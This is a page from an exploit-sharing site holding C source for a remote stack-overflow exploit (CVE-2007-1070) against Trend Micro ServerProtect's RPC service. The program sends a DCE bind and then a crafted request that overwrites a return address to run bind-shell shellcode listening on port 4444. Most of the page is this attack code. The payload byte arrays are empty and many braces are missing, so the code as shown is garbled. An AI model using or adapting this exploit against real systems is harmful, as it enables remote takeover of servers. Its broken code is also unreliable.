[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Trend Micro ServerProtect eng50.dll Remote Stack Overflow Exploit

Security Risk Unsored
remote exploits
Date add
Trend Micro ServerProtect eng50.dll Remote Stack Overflow Exploit

 * Copyright (c) 2007 devcode
 *			^^ D E V C O D E ^^
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 * Hotfix/Patch:
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
#include <iostream>
#include <windows.h>
#pragma comment( lib, "ws2_32.lib" )
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
/* rpc_opnum_0 */
unsigned char uszDceCall[] =
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char uszShellcode[] =
void usage( ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t\t(c) 2007 devcode\n\n"
			"usage: tmicro.exe <ip> <port>\n");
int main( int argc, char **argv ) {
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];
	unsigned char uszPacket[2056];
	int nRet;
	if ( argc < 3 ) {
		usage( );
		return -1;
	if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
		printf("[-] Unable to startup winsock\n");
		return -1;
	sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	if ( sConnect == INVALID_SOCKET ) {
		printf("[-] Invalid socket\n");
		return -1;
	sockAddr.sin_family = AF_INET;
	sockAddr.sin_addr.s_addr = inet_addr( argv[1] );	
	sockAddr.sin_port = htons( atoi( argv[2] ) );
	printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
	nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot connect to server\n");
		closesocket( sConnect );
		return -1;
	printf("[+] Sending DCE Bind packet...\n");
	nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
	if ( nRet  == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
	if ( nRet <= 0 ) {
		printf("[-] Recv failed\n");
		closesocket( sConnect );
		return -1;
	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;

#  0day.today [2024-06-28]  #